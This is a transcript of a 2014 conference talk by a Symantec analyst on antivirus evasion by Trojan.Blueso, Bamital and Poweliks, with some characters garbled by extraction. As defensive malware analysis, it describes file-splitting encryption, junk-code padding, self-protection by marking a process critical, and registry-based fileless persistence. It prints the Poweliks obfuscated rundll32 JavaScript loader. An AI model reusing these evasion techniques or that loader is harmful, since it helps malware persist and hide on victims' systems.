code blue 2014 : how to avoid the detection by malware by hiroshi sninotsuka
TRANSCRIPT
Self-‐introduc/on
Copyright © 2014 Symantec Corpora;on 2
• Threat analysis engineer in Symantec. • Analyze suspicious file and create An;-‐Virus signature • Provide detailed technical descrip;on to customers on demand
• Publically provide malware-‐related informa;on
ABacker’s techniques to avoid detec/ng
1 Store decryp;on key and data in separate files
2 Large amount of junk code
3 Process protec;on
4 Store malicious code outside of files (fileless malware)
Copyright © 2014 Symantec Corpora;on 4
Trojan.Blueso detec/on
Copyright © 2014 Symantec Corpora;on 5
0
5,000
10,000
15,000
20,000
25,000
30,000
35,000
Trojan.Blueso
August
September
October
November
Trojan.Blueso file structure
Copyright © 2014 Symantec Corpora;on 6
RAR self-‐extrac/ng file 13 MB
AutoIt executable file
Decryp;on code script file
Decryp;on key configura;on file
Encrypted code
AutoIt is a programing language for MicrosoW Windows plaYorm. The AutoIt syntax is very similar to that of BASIC programing language and is designed to automate the Windows GUI.
RAR self-‐extrac;ng file drops 4 files, then it execute AutoIt script
Decrypted code
Bluso inject Backdoor.Trojan
Copyright © 2014 Symantec Corpora;on 7
Code
Decryp;on key
Encrypted code
Legi;mate Windows Process
Decryp;on
Part of Decrypted
code
Internet Explorer Process
Decrypted code
AutoIt executable
Watch Dog monitor
Copyright © 2014 Symantec Corpora;on 8
File deleted
Process deleted Create Process
Inject
Create File
Trojan.Blueso make file/registry/process again if An;virus delete it.
ABacker’s techniques to avoid detec/ng
1 Store decryp;on key and data in separate files
2 Large amount of junk code
3 Process protec;on
4 Store malicious code outside of files (fileless malware)
Copyright © 2014 Symantec Corpora;on 9
Tradi/onal sample
Copyright © 2014 Symantec Corpora;on 10
Packer / Self update
• Harder to detect encrypted files. • Tradi;onal sample stored all informa;on in single file.
Code
Decryp;on key
Encrypted code
Code
Decrypted malicious code
New technique to avoid detec/on
Copyright © 2014 Symantec Corpora;on 11
Tradi;onally malware saved decrypted image to a file and executed. An;virus scanner detects malware when malware saved it decrypted image onto the disk.
New technique is to inject decrypted image to a new running process and executes in order to avoid detec;on by file scan.
Decrypted malicious code
Legi;mate Windows Process Decrypt in memory
Decrypted malicious code Code
Decryp;on key
Encrypted code
AutoIt executable
An;Virus scanner scans each file.
Why aBacker split malware into four separate files
Copyright © 2014 Symantec Corpora;on 13
AutoIt executable
Decryp;on code
Decryp;on key Seeng file
Encrypted code
Scan
Scan
Scan
Scan
What does this mean?
• Hiding malicious code by encryp;ng
• Store code, decryp;on key, encrypted code in separate files.
• An;virus scanner can’t determine ‘encrypted code’ as malicious file.
• An;virus scanner can’t detect the file without understanding rela;onships between mul;ple files.
Copyright © 2014 Symantec Corpora;on 14
ABacker’s techniques to avoid detec/ng
1 Store decryp;on key and data in separate files
2 Large amount of junk code
3 Process protec;on
4 Store malicious code outside of files (fileless malware)
Copyright © 2014 Symantec Corpora;on 15
Code(Beginning of file)
Copyright © 2014 Symantec Corpora;on 16
I TAB character is replaced with 1 byte string
You only see junk comment lines !
Code
Copyright © 2014 Symantec Corpora;on 19
Finally, at line 23670, 16MB in size, important code is reached. 87476 lines of AutoIt script codes. Only 900 lines without comment lines. Only 1% important codes.
An/virus scan method
Copyright © 2014 Symantec Corpora;on 20
• An;virus scanner needs to have balance between detec;on and performance
• An;virus scanner first determines file types and starts file scan based on the detected file type.
Executable file
ZIP file
JPEG file
No special file structure in text file/script file.
Copyright © 2014 Symantec Corpora;on 21
Script files have no file-‐header, which means the files have no special file structure.
An;virus scanner needs to run a par;al scan and determine what the file is.
Very difficult to keep scan performance if malicious script has so many comment/junk code.
ABacker’s techniques to avoid detec/ng
1 Store decryp;on key and data in separate files
2 Large amount of junk code
3 Process protec;on
4 Store malicious code outside of files (fileless malware)
Copyright © 2014 Symantec Corpora;on 22
How does Blueso start and protect itself?
Copyright © 2014 Symantec Corpora;on 23
Code
Decryp;on key
Encrypted code
Legi;mate Windows Process
Decryp;on
Internet Explorer process
Malware !! Malware ??
What is wrong ??
AutoIt executable
Process protec/on mechanism
Copyright © 2014 Symantec Corpora;on 24
1) Terminate Internet Explorer -‐> Malicious code injected into Legi;mate Windows Process is executed again
2) Terminate Legi;mate Windows Process -‐> Running script on AutoIt execute again
3) Terminate AutoIt ? -‐> Handle AutoIt executable as an essen;al process for Windows system by using undocumented API NtSetInforma;onProcess
As soon as AutoIT is terminated, Windows determines it as unrecoverable cri;cal problem.
-‐> Blue Screen Of Death !!
ABacker’s techniques to avoid detec/ng
1 Store decryp;on key and data in separate files
2 Large amount of junk code
3 Process protec;on
4 Store malicious code outside of files (fileless malware)
Copyright © 2014 Symantec Corpora;on 26
Example of malware store code/data in irregular place(Bamital)
Copyright © 2014 Symantec Corpora;on 27
Set registry entry to start a code when windows restarts.
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls\"AppSecDll" = "%USER_Profile%\Local Seengs\Applica;on Data\Windows Server\xblscp.dll“
Because of analysis already performed, xblscp.dll is determined as a malicious file.
Stricktly speaking, does this file have malicious code in it?
Example of malware store code/data in irregular place (Bamital)2
Copyright © 2014 Symantec Corpora;on 28
How it works
• Allocate memory • Store data from registry to the allocated memory • Call the allocated memory
An;virus scanner doe not know data rule. The data is wriven in registry. Another malware uses same technique by file.
Example of malware store code/data in irregular place(Poweliks)
Copyright © 2014 Symantec Corpora;on 29
Trojan.Poweliks writes a Windows Powershell script to registry.
You can find this registry entry may execute encrypted java script.
Encrypted code that should be decrypted in different registry entry.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-‐5D93-‐4B2E-‐BBB0-‐99B7938DA9E4}\LocalServer32\(Default) =
rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplica;on \";eval(\"epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/S~S�e)(ILDS]]dmtje]]|84f81:�.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*,(=0tdsjqu?(*\".replace(/./g,func;on(_){return%20String.fromCharCode(_.charCodeAt()-‐1);}))
"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@
Conclusion
Copyright © 2014 Symantec Corpora;on 30
• Avackers discover new techniques every day.
• Avackers employ techniques to make malware removal difficult • File based scanning is no longer effec;ve • Mul;-‐layered security is becoming more important
Thank you!
Copyright © 2014 Symantec Corpora/on. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corpora;on or its affiliates in the U.S. and other countries. Other names may be trademarks of their respec;ve owners.
This document is provided for informa;onal purposes only and is not intended as adver;sing. All warran;es rela;ng to the informa;on in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The informa;on in this document is subject to change without no;ce.
Hiroshi Shinotsuka